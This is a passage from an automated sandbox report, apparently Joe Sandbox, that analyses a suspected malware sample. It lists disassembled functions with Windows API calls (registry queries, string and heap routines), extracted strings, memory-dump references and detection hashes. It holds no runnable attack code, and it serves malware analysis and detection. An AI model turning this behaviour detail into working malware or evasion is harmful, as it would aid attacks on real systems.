                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 4d194018908de5308d3240ae9e8325a72c56fbd71acfb2b38a7d943282278b0a
                                  • Instruction ID: e20ed4ca7a17b406c0888c1a7e50ce540a0dc42f36fd2e6882713ffea85feef1
                                  • Opcode Fuzzy Hash: 4d194018908de5308d3240ae9e8325a72c56fbd71acfb2b38a7d943282278b0a
                                  • Instruction Fuzzy Hash: B9416271A2024C9FCB54EF64EC82FDE7778AB54344F508178B50DA7252EE30AA998F91
                                  Function 002C7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C7F60
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C7FA5
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C7FD3
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C8007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: af0de4c0967b9d7e82d1a9c1b42cb9ab66458887c89ab2e8aca90dacb27b58d4
                                  • Instruction ID: 40d62d9099c0760d8336709fa0dcde78ee6e03af537800e54fdccc4c30ab5904
                                  • Opcode Fuzzy Hash: af0de4c0967b9d7e82d1a9c1b42cb9ab66458887c89ab2e8aca90dacb27b58d4
                                  • Instruction Fuzzy Hash: 1A418B3062421ADFCB20DF69D8C0EAEB7B4FF55340B11429DE8059B251DB70AA65CF91
                                  Function 002C8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C80EA
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C8102
                                  • lstrlen.KERNEL32(00000000), ref: 002C8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 56fd875e245c2b3c0cb31a0c873a75eb59856edad8300c8ebe47fd0494ac5e2a
                                  • Instruction ID: 24d3de3ed6f7a0fd67dbb3e7f106dfc06fabfcd8f3822b5cfe0942675dfcef30
                                  • Opcode Fuzzy Hash: 56fd875e245c2b3c0cb31a0c873a75eb59856edad8300c8ebe47fd0494ac5e2a
                                  • Instruction Fuzzy Hash: 3441BC31620206EBDB21DF68D984FAABBF4EF44340F14866CA849D7245EF74ED65CB90
                                  Function 002D3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D3166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BBF68,00000000,00020119,?), ref: 002D318C
                                  • RegQueryValueExA.ADVAPI32(?,011CD870,00000000,00000000,00000000,000000FF), ref: 002D31A7
                                  • RegCloseKey.ADVAPI32(?), ref: 002D31B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 5100a1ec498b9d909ef29c53e09fb4f242ee8e1ff662807e47e4c8cea1fcfcb1
                                  • Instruction ID: 6d8ad01a65d41eb1d496b76a5a22a1d00e3dc3ffb6989fe8839cd5a1ab318cbf
                                  • Opcode Fuzzy Hash: 5100a1ec498b9d909ef29c53e09fb4f242ee8e1ff662807e47e4c8cea1fcfcb1
                                  • Instruction Fuzzy Hash: 17116076A40245AFD710CF94EC85FABB7BCE745710F10426AFA0997381DB74590087A5
                                  Function 002D90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 2b2c1a919c77348fd681d0d5befe8ca796fdc64f5c2efc651d23d21a14bf7ba1
                                  • Instruction ID: d2c743c1f70ad2f263ff2ee13b716c04d32424c01043174de5e0e67f85eb2ec1
                                  • Opcode Fuzzy Hash: 2b2c1a919c77348fd681d0d5befe8ca796fdc64f5c2efc651d23d21a14bf7ba1
                                  • Instruction Fuzzy Hash: 3C41E77151479D9EDB218F248C89FFB7BFC9B45304F1444E9F98A86282E2719E958F20
                                  Function 002B8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1D5
                                    • Part of subcall function 002DA1C0: std::exception::exception.LIBCMT ref: 002DA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B89CD
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 2d3667cba2f9ad7165a5c42d6a744fc12cae55919b4c13c10396eb07915bda93
                                  • Instruction ID: a351db9cc399cd50ceb9056c9c426cb6b14ae1ca69697e50abfb620787624cac
                                  • Opcode Fuzzy Hash: 2d3667cba2f9ad7165a5c42d6a744fc12cae55919b4c13c10396eb07915bda93
                                  • Instruction Fuzzy Hash: 2121D8723206508BCB209E5CE840AAAF79DDBA17E5B24093FF159CB341CB71DC61C7A6
                                  Function 002B8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8883
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: fb42c4af47b80f9b80c2b2336477259cece428c6bccef469794cb385726027d0
                                  • Instruction ID: a44c5b1297e8aff42839e78524ce366cdebf8ca72144f0013cfe3050b4304398
                                  • Opcode Fuzzy Hash: fb42c4af47b80f9b80c2b2336477259cece428c6bccef469794cb385726027d0
                                  • Instruction Fuzzy Hash: FC3197B5E005159BCB08DF58C8916AEBBB6EB88350F188269E919DB344DB30ED11CB91
                                  Function 002D5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5922
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: b45d23702d2c2c32bfd45894fde210edb9eed4c2db4143c592a85824927df855
                                  • Instruction ID: 478e3716fa7cbc68d3676244209fccbd151e6712fa9f51606268f482ac065e96
                                  • Opcode Fuzzy Hash: b45d23702d2c2c32bfd45894fde210edb9eed4c2db4143c592a85824927df855
                                  • Instruction Fuzzy Hash: 8F119A30324A60CBC3218E2CA810B4AB7E5AB92760F200A5FE0D187785CBB1EC51CBA1
                                  Function 002D3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,002DA430,000000FF), ref: 002D3D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D3D27
                                  • wsprintfA.USER32 ref: 002D3D37
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 938a611d4f4b5fb84ba21c479a67af745e4ebedb2098627fe49d8edfbe45a0a7
                                  • Instruction ID: 90a2c913d6a3950d66bb67d817c60ad661856bbd956932e5cd7078f133036178
                                  • Opcode Fuzzy Hash: 938a611d4f4b5fb84ba21c479a67af745e4ebedb2098627fe49d8edfbe45a0a7
                                  • Instruction Fuzzy Hash: F601D271680390BFE7209B54DC8AF6ABB7CFB46B61F400125FA059B3D1D7B41D00CAA9
                                  Function 002D926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 002D9279
                                    • Part of subcall function 002D87FF: __amsg_exit.LIBCMT ref: 002D880F
                                  • __amsg_exit.LIBCMT ref: 002D9299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: Xu.$Xu.
                                  • API String ID: 441000147-1797894820
                                  • Opcode ID: 802a81463c0625dcd4dcdaf13041cfba26bc04108bbe11a7587784315d086802
                                  • Instruction ID: e9f5461f13f2d5e40c8212b55b5bc66d4035d4f6d5de3a8a5ec7dacb0161324c
                                  • Opcode Fuzzy Hash: 802a81463c0625dcd4dcdaf13041cfba26bc04108bbe11a7587784315d086802
